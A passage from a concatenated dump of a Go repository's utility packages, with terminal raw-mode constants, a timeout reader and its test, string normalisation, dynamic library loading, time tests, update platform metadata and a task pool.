9 | GetMode func(std *os.File) (interface{}, error)
10 | // SetMode to file descriptor
11 | SetMode func(std *os.File, mode interface{}) error
12 | // SetRawMode to file descriptor enriching existign mode with raw console flags
13 | SetRawMode func(std *os.File, mode interface{}) error
14 | // Read from file descriptor to buffer
15 | Read func(std *os.File, buf []byte) (int, error)
16 |
17 | TCSETS uintptr
18 | TCGETS uintptr
19 | )
20 |
--------------------------------------------------------------------------------
/utils/putils/reader/rawmode/values_darwin.go:
--------------------------------------------------------------------------------
1 | //go:build darwin
2 |
3 | package rawmode
4 |
5 | import "syscall"
6 |
7 | func init() {
8 | TCSETS = syscall.TIOCGETA
9 | TCGETS = syscall.TIOCSETA
10 | }
11 |
--------------------------------------------------------------------------------
/utils/putils/reader/rawmode/values_linux.go:
--------------------------------------------------------------------------------
1 | //go:build linux
2 |
3 | package rawmode
4 |
5 | import "syscall"
6 |
7 | func init() {
8 | TCSETS = syscall.TCGETS
9 | TCGETS = syscall.TCSETS
10 | }
11 |
--------------------------------------------------------------------------------
/utils/putils/reader/timeout_reader.go:
--------------------------------------------------------------------------------
1 | package reader
2 |
3 | import (
4 | "context"
5 | "io"
6 | "time"
7 | )
8 |
9 | // TimeoutReader is a reader wrapper that stops waiting after Timeout
10 | type TimeoutReader struct {
11 | Timeout time.Duration
12 | Reader io.Reader
13 | datachan chan struct{}
14 | }
15 |
16 | // Read into the buffer
17 | func (reader TimeoutReader) Read(p []byte) (n int, err error) {
18 | var (
19 | ctx context.Context
20 | cancel context.CancelFunc
21 | )
22 | if reader.Timeout > 0 {
23 | ctx, cancel = context.WithTimeout(context.Background(), time.Duration(reader.Timeout))
24 | defer cancel()
25 | }
26 |
27 | if reader.datachan == nil {
28 | reader.datachan = make(chan struct{})
29 | }
30 |
31 | go func() {
32 | n, err = reader.Reader.Read(p)
33 | reader.datachan <- struct{}{}
34 | }()
35 |
36 | select {
37 | case <-ctx.Done():
38 | err = ErrTimeout
39 | return
40 | case <-reader.datachan:
41 | return
42 | }
43 | }
44 |
--------------------------------------------------------------------------------
/utils/putils/reader/timeout_reader_test.go:
--------------------------------------------------------------------------------
1 | package reader
2 |
3 | import (
4 | "io"
5 | "os"
6 | "testing"
7 | "time"
8 |
9 | "github.com/stretchr/testify/require"
10 | )
11 |
12 | func TestTimeoutReader(t *testing.T) {
13 | wrappedStdin := TimeoutReader{
14 | Reader: FrozenReader{},
15 | Timeout: time.Duration(2 * time.Second),
16 | }
17 | _, err := io.Copy(os.Stdout, wrappedStdin)
18 | require.NotNil(t, err)
19 | }
20 |
--------------------------------------------------------------------------------
/utils/putils/reflect/README.md:
--------------------------------------------------------------------------------
1 | # reflectutil
2 | The package contains various helpers for reflection
--------------------------------------------------------------------------------
/utils/putils/reflect/tests/tests.go:
--------------------------------------------------------------------------------
1 | package tests
2 |
3 | type Test struct {
4 | unexported string //nolint
5 | }
6 |
--------------------------------------------------------------------------------
/utils/putils/scripts/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yqcs/prismx/8b32e33639e031f38d6f9a4dee4b2a15fec1f13e/utils/putils/scripts/README.md
--------------------------------------------------------------------------------
/utils/putils/slice/README.md:
--------------------------------------------------------------------------------
1 | # sliceutil
2 | The package contains various helpers to interact with slices
--------------------------------------------------------------------------------
/utils/putils/strings/README.md:
--------------------------------------------------------------------------------
1 | # stringsutil
2 | The package contains various helpers to interact with strings
--------------------------------------------------------------------------------
/utils/putils/strings/strings_normalize.go:
--------------------------------------------------------------------------------
1 | package stringsutil
2 |
3 | import (
4 | "strings"
5 |
6 | "github.com/microcosm-cc/bluemonday"
7 | )
8 |
9 | type NormalizeOptions struct {
10 | TrimSpaces bool
11 | StripHTML bool
12 | Lowercase bool
13 | Uppercase bool
14 | }
15 |
16 | var DefaultNormalizeOptions NormalizeOptions = NormalizeOptions{
17 | TrimSpaces: true,
18 | StripHTML: true,
19 | }
20 |
21 | var HTMLPolicy *bluemonday.Policy = bluemonday.StrictPolicy()
22 |
23 | func NormalizeWithOptions(data string, options NormalizeOptions) string {
24 | if options.TrimSpaces {
25 | data = strings.TrimSpace(data)
26 | }
27 |
28 | if options.Lowercase {
29 | data = strings.ToLower(data)
30 | }
31 |
32 | if options.Uppercase {
33 | data = strings.ToUpper(data)
34 | }
35 |
36 | if options.StripHTML {
37 | data = HTMLPolicy.Sanitize(data)
38 | }
39 |
40 | return data
41 | }
42 |
43 | func Normalize(data string) string {
44 | return NormalizeWithOptions(data, DefaultNormalizeOptions)
45 | }
46 |
--------------------------------------------------------------------------------
/utils/putils/syscallutil/syscall_unix.go:
--------------------------------------------------------------------------------
1 | //go:build (darwin || linux) && !(386 || arm)
2 |
3 | package syscallutil
4 |
5 | import "github.com/ebitengine/purego"
6 |
7 | func loadLibrary(name string) (uintptr, error) {
8 | return purego.Dlopen(name, purego.RTLD_NOW|purego.RTLD_GLOBAL)
9 | }
10 |
--------------------------------------------------------------------------------
/utils/putils/syscallutil/syscall_unix_others.go:
--------------------------------------------------------------------------------
1 | //go:build (darwin || linux) && (386 || arm)
2 |
3 | package syscallutil
4 |
5 | import "errors"
6 |
7 | func loadLibrary(name string) (uintptr, error) {
8 | return 0, errors.New("not implemented")
9 | }
10 |
--------------------------------------------------------------------------------
/utils/putils/syscallutil/syscallutil.go:
--------------------------------------------------------------------------------
1 | package syscallutil
2 |
3 | func LoadLibrary(name string) (uintptr, error) {
4 | return loadLibrary(name)
5 | }
6 |
--------------------------------------------------------------------------------
/utils/putils/syscallutil/syscallutil_win.go:
--------------------------------------------------------------------------------
1 | //go:build windows
2 |
3 | package syscallutil
4 |
5 | import "golang.org/x/sys/windows"
6 |
7 | func loadLibrary(name string) (uintptr, error) {
8 | handle, err := windows.LoadLibrary(name)
9 | return uintptr(handle), err
10 | }
11 |
--------------------------------------------------------------------------------
/utils/putils/time/README.md:
--------------------------------------------------------------------------------
1 | # timeutil
2 | The package contains various helpers to interact with time
--------------------------------------------------------------------------------
/utils/putils/time/timeutil_test.go:
--------------------------------------------------------------------------------
1 | package timeutil
2 |
3 | import (
4 | "testing"
5 | "time"
6 |
7 | "github.com/stretchr/testify/require"
8 | )
9 |
10 | func TestRFC3339ToTime(t *testing.T) {
11 | orig := time.Now()
12 | // converts back
13 | tt, err := RFC3339ToTime(orig.Format(time.RFC3339))
14 | require.Nil(t, err, "couldn't parse string time")
15 | require.Equal(t, orig.Unix(), tt.Unix(), "times don't match")
16 | }
17 |
18 | func TestMsToTime(t *testing.T) {
19 | // TBD in chaos + bbsh
20 | }
21 |
22 | func TestSToTime(t *testing.T) {
23 | // TBD in chaos + bbsh
24 | }
25 |
26 | func TestParseDuration(t *testing.T) {
27 | tt, err := ParseDuration("2d")
28 | require.Nil(t, err, "couldn't parse duration")
29 | require.Equal(t, time.Hour*24*2, tt, "times don't match")
30 |
31 | tt, err = ParseDuration("2")
32 | require.Nil(t, err, "couldn't parse duration")
33 | require.Equal(t, time.Second*2, tt, "times don't match")
34 | }
35 |
--------------------------------------------------------------------------------
/utils/putils/update/utils_all.go:
--------------------------------------------------------------------------------
1 | //go:build !linux
2 | // +build !linux
3 |
4 | package updateutils
5 |
6 | import (
7 | "encoding/base64"
8 | "runtime"
9 | "strings"
10 | )
11 |
12 | // Get OS Vendor returns the linux distribution vendor
13 | // if not linux then returns runtime.GOOS
14 | func GetOSVendor() string {
15 | return runtime.GOOS
16 | }
17 |
18 | // returns platform metadata
19 | func getPlatformMetadata() string {
20 | tmp := runtime.GOOS + "|" + runtime.GOARCH
21 | return strings.TrimSuffix(base64.StdEncoding.EncodeToString([]byte(tmp)), "==")
22 | }
23 |
--------------------------------------------------------------------------------
/utils/putils/update/utils_linux.go:
--------------------------------------------------------------------------------
1 | //go:build linux
2 | // +build linux
3 |
4 | package updateutils
5 |
6 | import (
7 | "encoding/base64"
8 | "runtime"
9 | "strings"
10 |
11 | "github.com/zcalusic/sysinfo"
12 | )
13 |
14 | // Get OS Vendor returns the linux distribution vendor
15 | // if not linux then returns runtime.GOOS
16 | func GetOSVendor() string {
17 | var si sysinfo.SysInfo
18 | si.GetSysInfo()
19 | return si.OS.Vendor
20 | }
21 |
22 | // returns platform metadata
23 | func getPlatformMetadata() string {
24 | var si sysinfo.SysInfo
25 | si.GetSysInfo()
26 | tmp := strings.ReplaceAll(si.Board.Vendor, " ", "_") + "|" + strings.ReplaceAll(si.Board.Name, " ", "_")
27 | if tmp == "|" {
28 | // instead of just empty string return os for more context
29 | tmp = runtime.GOOS + "|" + runtime.GOARCH
30 | }
31 | return strings.TrimSuffix(base64.StdEncoding.EncodeToString([]byte(tmp)), "==")
32 | }
33 |
--------------------------------------------------------------------------------
/utils/task/pool.go:
--------------------------------------------------------------------------------
1 | package task
2 |
3 | import (
4 | "github.com/panjf2000/ants/v2"
5 | "sync"
6 | )
7 |
8 | // Pool 任务池
9 | type Pool struct {
10 | //PoolWithFunc 队列
11 | PoolWithFunc *ants.PoolWithFunc
12 | //堵塞器
13 | Wg *sync.WaitGroup
14 | }
15 |
16 | // NewPool 实例化工作池使用
17 | func NewPool() *Pool {
18 | return &Pool{
19 | Wg: &sync.WaitGroup{},
20 | }
21 | }
22 |
--------------------------------------------------------------------------------